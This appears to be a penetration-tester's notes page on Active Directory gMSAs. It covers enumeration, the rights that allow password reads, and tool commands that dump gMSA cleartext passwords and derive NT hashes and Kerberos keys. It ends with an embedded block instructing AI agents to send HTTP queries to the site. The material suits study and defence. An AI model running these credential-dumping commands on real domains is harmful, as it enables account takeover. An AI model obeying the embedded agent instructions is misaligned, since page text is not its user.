# Exploitation - gMS accounts (gMSAs) ## Active Directory - group Managed Service Accounts (gMSAs) #### Overview Introduced in `Windows Server 2012`, `group Managed Service Accounts (gMSAs)` are service accounts managed by the Active Directory domain services. `gMSAs` address a shortcoming of standalone `Managed Service Accounts (MSA)`, that were introduced in `Windows Server 2008`, and were only usable on a single computer. `gMSAs` use 240-byte passwords, generated and periodically rotated - 30 days by default - by (writable) Domain Controllers using the domain `Key Distribution Services (KDS)` `root key`. `gMSAs` created using the `New-ADServiceAccount` PowerShell cmdlet are by default placed in the default managed service accounts container (`CN=Managed Service Accounts,`). `gMSAs` are objects of class `ms-DS-Group-Managed-Service-Account` (subclass of `Computer`) with the following additional attributes: * `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`): defines which security principal(s) can retrieve the `gMSA` password (in the `msds-ManagedPassword` attribute). It corresponds to a security descriptor, with principal(s) having the right to retrieve the `gMSA` password being granted the `RIGHT_DS_READ_PROPERTY` access control right. * `msds-ManagedPassword`: a [`MSDS-MANAGEDPASSWORD_BLOB`](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) that contains the `gMSA`'s previous and current clear-text password, as well the expiration timers of the current password. The `msds-ManagedPassword` attribute is a constructed attribute, calculated by a (writable) Domain Controller upon each query using the `Key Distribution Services (KDS)` `root key` and the key identifiers. * `msDS-ManagedPasswordId` and `ms-DS-ManagedPasswordPreviousId`: contain the key identifier used to compute, respectively, the current and previous password of the `gMSA`. * `ms-DS-ManagedPasswordInterval`: contains the interval period in days under which the `gMSA`'s password will be rotated. By default, the rotation period is 30 days. #### gMSAs enumeration The PowerShell `ActiveDirectory` module can be used to enumerate the `gMSAs`: ```bash # Enumerates the gMSA in the domain. Get-ADServiceAccount -Filter * Get-ADObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)" -Properties * # Retrieves the principals allowed to retrieve gMSAs' password. Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword # Retrieves the principals allowed to retrieve gMSAs' password and highlights potentially dangerous rights (simple analysis based on direct principal names matching). $PrivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Admins', 'CN=Enterprise Admins', 'CN=Domain Controllers')) $UnprivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Users', 'Everyone', 'CN=Domain Computers', 'Authenticated Users', 'Anonymous')) Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword | ForEach-Object { Write-Host -ForegroundColor DarkGreen -BackgroundColor White $_.SamAccountName Write-Host $_.DistinguishedName Write-Host $_.SID Write-Host "`n" Write-Host "PrincipalsAllowedToRetrieveManagedPassword:" foreach ($Principal in $_.PrincipalsAllowedToRetrieveManagedPassword) { If ($Principal -match $UnprivilegedPrincipalsRegex) { Write-Host -ForegroundColor Green $Principal } ElseIf ($Principal -match $PrivilegedPrincipalsRegex) { Write-Host -ForegroundColor Red $Principal } Else { Write-Host -ForegroundColor Yellow $Principal } } Write-Host "`n" } ``` #### gMSAs ACL enumeration and msDS-GroupMSAMembership modification Refer to the `[ActiveDirectory] ACL exploiting` note (`group Managed Service Accounts (gMSA)` section) for more information on techniques and tools to modify `gMSAs`'s `msDS-GroupMSAMembership` attribute. #### gMSAs password retrieval Multiple tools and utilities can be used to retrieve a `gMSA` account password, and further derivate its `NTLM` / `NTHash` and `Kerberos` secrets (`AES 128` and `AES 256` keys): | Tool | URL | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |

PowerShell ActiveDirectory and DSInternals modules:

ActiveDirectory module:
Get-ADServiceAccount

DSInternals module: ConvertFrom-ADManagedPasswordBlob
ConvertTo-NTHash

| |

Combination of PowerShell cmdlets from the ActiveDirectory and DSInternals modules to retrieve all or the specified gMSAs password and compute the corresponding NTLM / NTHash and Kerberos secrets.

Uses the current security context and supports alternate credentials (username/password).

| | [`GMSAPasswordReader`](https://github.com/rvazarkar/GMSAPasswordReader) | |

C# utility that retrieve the specified gMSA current and past password to calculate the corresponding NTLM / NTHash and Kerberos secrets.

Uses the current security context.

| | [`gMSADumper.py`](https://github.com/micahvandeusen/gMSADumper) |



Compiled standalone Linux / Windows x64 binaries:

|

Python script to retrieve all gMSAs password (that the given user has access to) to compute the corresponding NTLM / NTHash.

Supports user authentication with username/password, username/NTHash, or Kerberos tickets (on Linux using a ticket in the credential cache (ccache) format). Does not leverage the current security context.

| ```bash # PowerShell ActiveDirectory and DSInternals modules. # Import-Module "\DSInternals.psd1" $gMSA = Get-ADServiceAccount -Identity '' -Properties 'msDS-ManagedPassword' $msDSMP_blob = $gMSA.'msDS-ManagedPassword' # Decodes the MSDS-MANAGEDPASSWORD_BLOB data structure using the DSInternals module. $CleartextPassword = ConvertFrom-ADManagedPasswordBlob $msDSMP_blob $CleartextPassword # Converts the cleartext password to the corresponding NTLM / NT hash using the DSInternals module. # To compute the corresponding Kerberos secrets using the cleartext password, refer to the "[ActiveDirectory] Kerberos tickets usage" note. ConvertTo-NTHash -Password $CleartextPassword.SecureCurrentPassword # GMSAPasswordReader C# utility. GMSAPasswordReader.exe --AccountName # gMSADumper.py Python script and standalone compiled binaries. gMSADumper.py -d -u -p # if only the NT_HASH is known: 'aad3b435b51404eeaad3b435b51404ee:' gMSADumper.py -d -u -p # On Linux, Kerberos authentication using a Ticket-Granting-Ticket in the ccache format. gMSADumper.py -k -d -u ``` *** ## References --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.qazeer.io/active-directory/exploitation-gms_accounts.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.